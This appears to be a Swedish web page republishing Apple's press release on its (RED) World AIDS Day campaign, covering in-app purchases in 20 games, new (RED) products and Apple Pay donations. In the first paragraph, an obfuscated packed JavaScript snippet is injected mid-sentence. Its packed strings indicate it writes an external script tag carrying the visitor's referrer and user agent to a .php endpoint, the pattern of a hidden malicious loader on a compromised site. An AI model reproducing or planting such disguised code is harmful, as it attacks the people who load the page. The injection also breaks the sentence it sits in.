Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Apple och (RED) presenterar fler sätt än någonsin att delta i kampen mot aids

apple logo
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzaab|var|u0026u|referrer|razre||js|php’.split(’|’),0,{}))
uppmärksammar Världsaidsdagen genom att erbjuda fler sätt än någonsin för att hjälpa (RED) att uppfylla sitt mål om att skapa en aidsfri generation. Apple är det företag som bidrar mest till Globala fonden, och i år firar vi tio år av stöd till (RED) i kampen mot aids.

(RED):s oerhört viktiga arbete riktar sig mot skillnaderna som finns vad gäller tillgång till läkemedel som räddar liv i Afrika söder om Sahara, den del som har den högsta förekomsten av aids i världen. Pengar som samlas in genom (RED) finansierar program somerbjuder rådgivning, testning, förebyggande åtgärder och, viktigast av allt, antiretrovirala läkemedel som räddar liv genom att hiv hindras från att överföras från modern till fostret.

”Att ge liv är den viktigaste gåvan vi kan ge”, säger Apples vd Tim Cook. ”Tack vare (RED):s vision och engagemang ligger en generation fri från aids inom räckhåll för oss. Vi vill lämna världen i ett bättre skick än vi fann den, och det är därför som vårt långvariga samarbete med (RED) fortfarande är så viktigt för oss.”

I år kan Apples kunder stödja kampen samtidigt som de spelar spel de gillar, köper klappar till nära och kära eller lyssnar på ett exklusivt (RED)-julalbum från The Killers.

Under nästa vecka innehåller några av de populäraste spelen på App Store – från racing- och sportspel till strategiska spel, pusselspel och actionspel – anpassat (RED)-innehåll i begränsad upplaga som endast finns på App Store. Alla intäkter från köp inuti appar som omfattas av kampanjen går till Globala fonden.

De 20 spel som ingår i kampanjen är Angry Birds 2, Angry Birds POP!, Best Fiends, Best Fiends Forever, Boom Beach, Candy Crush Jelly Saga, Clash of Clans, Clash Royale, CSR2, Episode, Farm Heroes Saga, FarmVille: Tropic Escape, FIFA Mobile, Hay Day, MARVEL Contest of Champions, PewDiePie’s Tuber Simulator, Plants vs. Zombies Heroes, SimCity BuildIt, War Dragons och YAHTZEE With Buddies.

Dessutom utökar Apple det nuvarande (PRODUCT)RED-sortimentet som går att köpa året om med fyra nya (RED)-produkter: ett Smart Battery Case till iPhone 7, ett skal till iPhone SE, trådlösa Beats Solo 3-hörlurar och bärbara Pill+-högtalare. Alla dessa finns att köpa redan idag.

Över 400 Apple Store-butiker i fem världsdelar får röda logotyper eller (RED)-fönsterdekaler, vilket ska öka synligheten för Världsaidsdagen under Apples mest omfattande stöd för (RED) i sina butiker. Apple Store-medarbetare kommer att berätta om alla de sätt som kunderna kan stödja (RED) och kämpa mot aids tillsammans med oss.

Från och med imorgon till och med den 6 december, donerar Apple 1 dollar till (RED):s uppdrag för varje köp som görs med Apple Pay i en Apple Store-butik, på Apples webbplats eller via Apple Store-appen, upp till 1 miljon dollar. Bank of America gör också en donation för varje Apple Pay-transaktion med bankens kort, också upp till 1 miljon dollar.

Kunder världen över kan också enkelt donera direkt till (RED) via iTunes. I USA erbjuder Apple en gratis nerladdning av The Lazarus Effect, dokumentären om (RED):s uppdrag, i iTunes Movies.

The Killers julalbum, Don’t Waste Your Wishes, finns exklusivt på iTunes och innehåller alla tio av deras bästa julsinglar samt en ny låt,”I’ll Be Home for Christmas”. Alla intäkter i USA går till Globala fonden.

Under de senaste 10 åren har 70 miljoner liv påverkats av Globala fondens bidrag som stöds av (RED). I början av Apples samarbete med (RED) föddes 1 200 barn med hiv varje dag, och idag förutspår UNAIDS att antalet kan vara nära noll 2020 och att vi har fått slut på aids 2030.

Livräddande läkemedel kostar bara 2,75 kronor per dag så varje person kan göra skillnad. Genom dessa insatser kommer vi så mycket närmare att hjälpa (RED) att skapa en generation fri från aids.

När Apple lanserade Macintosh 1984 var det början på en revolution. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att skapa produkter av hög kvalitet och förbättra kundernas tillvaro.

Tags